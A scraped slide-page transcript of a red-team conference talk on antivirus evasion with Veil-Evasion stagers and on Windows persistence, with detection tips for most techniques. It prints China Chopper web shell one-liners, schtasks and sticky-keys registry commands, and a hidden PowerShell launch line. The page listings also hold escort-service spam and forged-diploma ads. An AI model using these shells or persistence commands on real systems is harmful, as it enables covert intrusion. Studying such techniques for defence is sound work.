Ceh v5 module 19 evading ids firewall and honeypotCeh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypot
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahNull 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
 
Static analysis for security
Static analysis for securityStatic analysis for security
Static analysis for security
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suite
 
The real and another
The real and anotherThe real and another
The real and another
 
Staged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business SuiteStaged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business Suite
 
Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)
 
Clientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyClientside attack using HoneyClient Technology
Clientside attack using HoneyClient Technology
 
Cyber Security Visualization
Cyber Security VisualizationCyber Security Visualization
Cyber Security Visualization
 
Honeywall roo 2
Honeywall roo 2Honeywall roo 2
Honeywall roo 2
 
The Beginning Of World War Ii
The Beginning Of World War IiThe Beginning Of World War Ii
The Beginning Of World War Ii
 
Ldap injection
Ldap injectionLdap injection
Ldap injection
 

Similaire à The Supporting Role of Antivirus Evasion while Persisting

CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14jemtallon
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing DevelopmentCTruncer
 
Secure Developer Access at Decisiv
Secure Developer Access at DecisivSecure Developer Access at Decisiv
Secure Developer Access at DecisivTeleport
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface DevicePositive Hack Days
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Crikeycon 2019 Velociraptor Workshop
Crikeycon 2019 Velociraptor WorkshopCrikeycon 2019 Velociraptor Workshop
Crikeycon 2019 Velociraptor WorkshopVelocidex Enterprises
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
 
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth TakingTop 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth TakingPaula Januszkiewicz
 
The Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldDevOps.com
 
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...Paulo Henrique
 
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)Ron Munitz
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
So you want to be a security expert
So you want to be a security expertSo you want to be a security expert
So you want to be a security expertRoyce Davis
 
First adventure within a shell - Andrea Telatin at Quadram Institute
First adventure within a shell - Andrea Telatin at Quadram InstituteFirst adventure within a shell - Andrea Telatin at Quadram Institute
First adventure within a shell - Andrea Telatin at Quadram InstituteAndrea Telatin
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 

Similaire à The Supporting Role of Antivirus Evasion while Persisting (20)

CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
 
Secure Developer Access at Decisiv
Secure Developer Access at DecisivSecure Developer Access at Decisiv
Secure Developer Access at Decisiv
 
Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP Shells
 
Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
 
Creating Havoc using Human Interface Device
Creating Havoc using Human Interface DeviceCreating Havoc using Human Interface Device
Creating Havoc using Human Interface Device
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Crikeycon 2019 Velociraptor Workshop
Crikeycon 2019 Velociraptor WorkshopCrikeycon 2019 Velociraptor Workshop
Crikeycon 2019 Velociraptor Workshop
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
 
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth TakingTop 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
Top 10 Ways To Make Hackers Excited: All About The Shortcuts Not Worth Taking
 
The Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote World
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
FLISOL 2015 - Criptografia é importante! Aprenda meios simples de proteger ar...
 
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
So you want to be a security expert
So you want to be a security expertSo you want to be a security expert
So you want to be a security expert
 
First adventure within a shell - Andrea Telatin at Quadram Institute
First adventure within a shell - Andrea Telatin at Quadram InstituteFirst adventure within a shell - Andrea Telatin at Quadram Institute
First adventure within a shell - Andrea Telatin at Quadram Institute
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 

Dernier

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012rehmti665
 
Intellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxIntellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxBipin Adhikari
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 

Dernier (20)

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
Intellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxIntellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptx
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 

The Supporting Role of Antivirus Evasion while Persisting

  • 1. The Supporting Role of Antivirus while Persisting @ChrisTruncer
  • 2. Christopher Truncer Previous Systems Administrator turned Red Teamer Red Team Lead at Mandiant Florida State Seminole Open Source Developer @ChrisTruncer
  • 3. What’s this talk about? ◉ How Stagers Work ◉ Case Study: Bypassing a Signature ◉ The Right Way to do Detection ◉ Persistence - lots of it! :) ◉ Old School and New School Techniques ◉ Persistence Detection ◉ Questions
  • 5. Antivirus Evasion ◉ Whites hats and attackers need to evade antivirus ◉ Evading to establish immediate C&C of compromised system ◉ Also used to maintain access on a system/in a network
  • 6. Antivirus Evasion ◉ If required to use an executable, we’ll use a stager ◉ Stager - Veil-Evasion or MSFVenom output ◉ Inject shellcode into memory ◉ Shellcode will download and inject a reflective dll ◉ A “loader” for your real malware
  • 7. Stagers ◉ Stagers can be developed in any language that can interact with the Windows functions ◉ It’s not hard to write a stager ○ Just four function calls
  • 8. Stagers ◉ Allocate memory to store shellcode, and set the proper memory permissions ◉ Copy shellcode into the allocated memory ◉ Create a thread to execute the shellcode ◉ Have code wait until thread is done executing
  • 9. Stagers ◉ VirtualAlloc ◉ RtlMoveMemory ◉ CreateThread ◉ WaitforSingleObject
  • 10.
  • 11. AV’s Approach to Catching Malware
  • 12. Methods of Detection ◉ Signature Based ○ This is what Veil-Evasion targets ◉ Heuristics Based ◉ Crowd Sourced ○ Reputation Based
  • 13. Veil’s Approach to Bypassing AV
  • 14. Approaches to Bypassing AV ◉ Ghost code / net no-operation code ◉ Encrypted binaries ○ Hyperion ◉ Custom Code
  • 15. Veil’s Approach ◉ Fight on-disk detection through different techniques ○ Obfuscated code ○ Encrypted code ○ Non-standard languages for Windows binaries ■ Python, Ruby, Perl, etc. ○ Shellcode-less binaries
  • 16. Veil’s Approach ◉ Languages within Veil-Evasion ○ Python ○ Perl ○ PowerShell ○ C# ○ C ○ Go ○ Ruby
  • 17. Veil’s Approach ◉ Using a language that’s not C or C# made a large difference ○ AV programs didn’t know or couldn’t properly inspect non-standard languages ◉ Example: ○ C vs. Python
  • 18.
  • 19.
  • 20. Simply changing the language the code is written in completely bypassed all signatures.
  • 22.
  • 23. Veil Module ◉ Add a little complexity, so it isn’t just easily obvious what is happening ◉ What about encrypting the code? ◉ What about making the tool brute-force its own key?
  • 24. Stallion ◉ Generate a random encryption key, that is artificially constrained ○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567 ◉ Test for a known string with decryption key ○ If it doesn’t match, it’s the wrong key ○ If it matches, decrypt the shellcode and inject it into memory
  • 25.
  • 26.
  • 28. Signature Bypass ◉ After approximately one year, Veil had its first AV signature
  • 29. Signature Bypass ◉ I was excited to see if someone finally figured Veil-Evasion out ○ It is open source… ◉ Previous attempts have turned out fairly humorous
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 40. Persistence Purposes ◉ Persistence is commonly used to for one of two purposes: ○ Persisting on a host ○ Persisting a network ◉ A lot of the techniques I will cover can facilitate access for both purposes
  • 41. Persisting Hosts ◉ When persisting a host, an attacker is looking for ad-hoc, or programmatically defined access, to a system ○ Attacker want this as close to on-demand as possible ◉ The efforts undertaken by an attacker are directed to maintaining access to a specific host
  • 42. Persisting Hosts ◉ What’s needed for persisting hosts? ○ Survive Reboots ■ Probably the most important concept ○ Have administrative rights on the system ○ Compliment network based persistence
  • 43. Persisting Networks ◉ Network based persistence in two contexts ○ Used to maintain access into a network ■ Similar to host-based persistence, but its purpose isn’t for access to host, but the network ○ Used to maintain access into different networks ■ Don’t want to be VLANed off in in a VOIP network
  • 44. Persisting Networks (continued) ◉ What’s other network based persistence options? ○ Attackers can use persistence not only to maintain access to a network, but also obtaining their required domain permissions on-demand ○ Access likely facilitated through a host-based persistence technique
  • 46. Web Shells ◉ Funny, this seems trivial and too easy that no one would ever use this… ◉ ...that’s not the case ○ China Chopper - APT17, APT19, APT22 ○ ITSecShell, reDuh, ASPShell ○ Even commodity code
  • 47. China Chopper ◉ Very tiny webshell, about 4kb stored server side ◉ Developed in a variety of languages ○ CFM ○ ASP ○ PHP ○ Etc. ◉ A client application is used to interact with the webshell
  • 48. China Chopper Server Code ◉ ASP ○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsa fe");%> ◉ PHP ○ <?php @eval($_POST['password']);?> https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
  • 49.
  • 50. China Chopper ◉ Really useful features in China Chopper ○ File Explorer ○ Upload/Download files ○ Mod file timestamp attributes ○ Database client - MSSQL, MySQL ○ Command shell
  • 51. Web Shell Prevention & Detection ◉ Hunt/Sweep for known bad files ○ Hashes, or other file based indicators ◉ Blacklist all filetypes except expected files for upload functionality ◉ Don’t allow your web server to execute files uploaded from untrusted sources
  • 52. Magic Packet ◉ Or “how to access port 12345 with a packet to port 443” ◉ The attacker’s problem: ○ Compromised a web server (port 80 and 443 are in use) ○ Firewall(s) prevent connection to any other port ○ Wants a TCP backdoor to be remotely accessible ■ Can’t be bothered to write a webshell
  • 53. Magic Packet ◉ Run backdoor listening on port 12345 ◉ Run malware “low” in the network stack ○ Check incoming TCP SYN packets ○ When a SYN packet is received with a specific signature, change destination port from 443 to 12345 ○ Windows network stack then delivers the pack to port 12345 ○ Malware alters the port in all subsequent packets for the stream
  • 54. Syn, dport: 443 data=s3cr37 Malware Syn, dport: 12345 SynAck sport: 12345 SynAck sport: 443 12345 Compromised System 443
  • 55. Magic Packet - Defenses ◉ This malware was installed via a custom compiled executable ○ Application Whitelisting ○ Device Guard
  • 56. Outlook ◉ Outlook rules can help provide a very unique on-demand foothold onto a host ◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system ◉ Provides access immediately when Outlook triggers the rule
  • 57. Outlook ◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received ◉ Attacker will sync the rule against the target user’s account ◉ Send an e-mail with the trigger in the subject ◉ Get shell :)
  • 58.
  • 59.
  • 60. Outlook - Additional Tweaks ◉ Have another rule auto-delete the incoming e-mail to prevent user detection of the trigger ○ https://silentbreaksecurity.com/malicious-outlook-rules/
  • 61. Outlook - Detection ◉ Honestly, not certain on the best means to detect this at scale ◉ Primary IOC is to execute a program when receiving an e-mail ○ I don’t know if any legit use cases for this
  • 63. Registry Hacks ◉ This is the 101 method for persistence that almost everyone learns ◉ Extremely easy to set up, and can be installed with a range of permissions
  • 64. Registry Hacks ◉ These can be configured to run when the system starts, or a user logs into the system ○ HKLMSOFTWAREMicrosoftWindowsCurrentVersionR un ○ HKCUSOFTWAREMicrosoftWindowsCurrentVersionR un ◉ These methods are highly publicized and well known. ◉ Defensive tools look for these
  • 65. Registry Hacks - Takeaway ◉ These can be good for maintaining initial access, but not for long term use ◉ SOCs - you want to have the ability to detect these
  • 66. Startup Folder ◉ Your system will execute files in the startup folder ○ C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup
  • 67. Scheduled Tasks ◉ Scheduled tasks are an easy way for a user of any level to persist on a system ◉ With the proper permissions, you can schedule a task up to the SYSTEM level ◉ This is Microsoft’s recommendation/alternative to using “at” jobs
  • 68. Scheduled Tasks ◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI ◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc. ◉ Tasks can run binaries, PowerShell one-liners, and more
  • 69.
  • 70. Scheduled Tasks ◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:userschrisdownloadssafe.exe ◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:totallylegit.exe /s winsqldbsystem
  • 71. Scheduled Tasks - Detection ◉ Obtain a baseline of the scheduled tasks set to run on your systems ○ Schtasks /query ○ Task scheduler ○ Etc. ◉ Audit systems and identify deviations from your baseline
  • 72. Service Manipulation ◉ Services usually run with SYSTEM level permissions, so can be juicy targets for attackers ◉ Easy way to install service based persistence? Check service binary write permissions!
  • 73.
  • 74. Service Manipulation ◉ Now that you found services that can be modified, you just need a service binary. ○ Veil-Evasion, PowerUp, custom code ◉ Save the original service binary ◉ Bounce the box (or service) if required
  • 75. Sticky Keys ◉ With administrative access to a machine, you can easily setup sticky keys ○ Copy sethc.exe ○ Copy cmd.exe to C:WindowsSystem32sethc.exe ○ Reboot, and hit shift five times
  • 76.
  • 77. Sticky Keys - Another Method ◉ Set cmd.exe as the debugger for sethc.exe ◉ REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"
  • 78. Sticky Keys - Another Method ◉ Main problem - doesn’t require authentication ◉ If using Sticky Keys, ensure it’s calling back to a location you control, vs. opening up the system for everyone
  • 79. Sticky Keys - Detection ◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary ◉ Ensure no registry key is added defining a debugger for sethc.exe
  • 81. DLL Search Order Hijack ◉ DLL search order hijacking exploits how windows searches for DLLs when loading an executable ◉ Specifically, it exploits the fact that Windows will always search the currently folder of the executable for a dll
  • 82. DLL Search Order Hijack ◉ Sample in CAPEC ○ If you drop ntshrui.dll within C:Windows and run explorer.exe, you can get the dll within C:Windows to be executed ◉ This exploits the order in which the dll is searched for on a Windows system
  • 83. DLL Search Order Hijack ◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system ◉ Since it’s every time the application runs, it can be used as a persistence technique ◉ PowerUp can be used to find these opportunities
  • 84. DLL Search Order Hijack ◉ Used by the following actors: ○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26 ◉ Used by the following malware: ○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
  • 85. Legitimate Scheduled Tasks ◉ Easy to identify scheduled tasks named “Evil task” ◉ First we must look at how investigators detect malicious scheduled tasks
  • 86. Legitimate Scheduled Tasks ◉ Stacking tasks across multiple systems to determine anomalous tasks ◉ Parse task scheduler log (schedLgu.txt)
  • 87. Legitimate Scheduled Tasks ◉ What if we modify existing legit scheduled tasks? ○ Specifically tasks that are not required for Windows functionality
  • 88. Unquoted Service Paths ◉ Unquoted service paths exploit a vulnerability in the order that Windows searches for a binary when a space is in an unquoted path ○ C:Program Files(x86)SteamSteam Gamingsteam.exe
  • 89. Unquoted Service Paths ◉ C:Program Files(x86)SteamSteam Gamingsteam.exe ○ C:Program.exe ○ C:Program Files(x86)SteamSteam.exe ○ C:Program Files(x86)SteamSteam Gamingsteam.exe ◉ Three opportunities
  • 90. Unquoted Service Paths ◉ If we have write access to any of the paths that Windows looks for, we can hijack the service ○ Just need a service binary ◉ Drop it into any of the paths on the previous slide, and restart the service ○ Might need to wait for a reboot
  • 91. Unquoted Service Paths - Prevention ◉ Check service binaries on your images and determine if any are using unquoted service paths. ◉ Make sure the paths aren’t writable to non-admins. ◉ PowerUp can find these as well
  • 92. WMI Requirements ◉ Event Filter ◉ Event Consumer ◉ Filter/Consumer Binding
  • 93. WMI Requirements - Event Filter ◉ The WMI query that fires upon an event occurring ○ Usually, an event class derived from __InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent
  • 94. WMI Requirements - Event Consumer ◉ There are five different event consumers ○ The most interesting one is “CommandLineEventConsumer” ◉ These “consume” or act on events that occur
  • 95. WMI Requirements - Filter/Consumer Binding ◉ This associates a WMI Event Filter with the Event Consumer
  • 96. WMI - Persistence ◉ PowerSploit’s persistence module for WMI ○ Automates the creation process ○ Will create a permanent WMI event subscription
  • 97. PowerShell Profiles ◉ Anytime PowerShell runs, it will execute code in the default profile ◉ Create profile code here: ○ C:WindowsSystem32WindowsPowerShellv1.0profile.p s1
  • 98. PowerShell Profiles ◉ Use standard persistence mechanism to execute PowerShell silently ○ "C:WindowsSystem32WindowsPowerShellv1.0powers hell.exe" -NonInteractive -WindowStyle Hidden ○ It’s a legit exe!
  • 99. PowerShell Profiles ◉ Example in profile.ps1: ○ iex("write-host 'hello world'")
  • 100. Security Support Provider ◉ A Security Support Provider (SSP) - a security package ○ An extension used to perform authentication during client/server exchange ◉ An Authentication Package (AP) ○ Extends interactive login authentication ○ Example: RSA tokens
